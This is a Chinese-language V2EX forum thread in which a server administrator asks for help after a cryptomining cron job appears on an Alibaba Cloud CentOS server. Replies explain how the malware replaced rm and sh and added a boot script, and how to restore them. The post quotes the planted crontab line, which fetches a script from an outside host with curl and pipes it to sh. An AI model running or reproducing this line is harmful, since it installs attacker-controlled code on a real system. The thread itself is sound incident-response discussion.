求助,服务器 crontab 被人异常加入挖矿脚本

2019-03-20 13:50:08 +08:00
 guanhui07

线上服务器 crontab 被人异常加入挖矿脚本 添加的脚本如下:

*/6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1

服务器 阿里云 ceontos7 8 核心 8g 内存

环境 openresty/1.13.6.2 mysql5.7 php7.2.6 redis rabbitmq

ssh 修改了 35523 端口,禁止了 root 登录,但开了几个账号公司员工登录,密码足够复杂,

过程如上..还没解决 ,有遇到的留言 讨论下 ,哪里漏洞 解决方法,谢谢

5425 次点击
所在节点    Linux
23 条回复
baoshuai33
2019-05-07 11:57:40 +08:00
@tzwsoho rm 命令被替换了, 源文件被替换成了 rmm

\mv /usr/bin/rmm /usr/bin/rm
\mv /usr/bin/sh_ex /usr/bin/sh
baoshuai33
2019-05-07 12:03:48 +08:00
@tzwsoho 根据这篇文章来看 https://www.anquanke.com/post/id/175725 还增加了个开机自启动脚本 ats :/etc/rc.d/init.d/ats
vipdog73
2019-05-17 11:27:53 +08:00
原本的 rm 命令被换成了 rmm。记得删掉 rmm -rf /usr/bin/rm 然后 mv /usr/bin/rmm /usr/bin/rm,如果删不掉记得看下权限。lsattr 看下是不是加了 ia 权限

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/546567

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX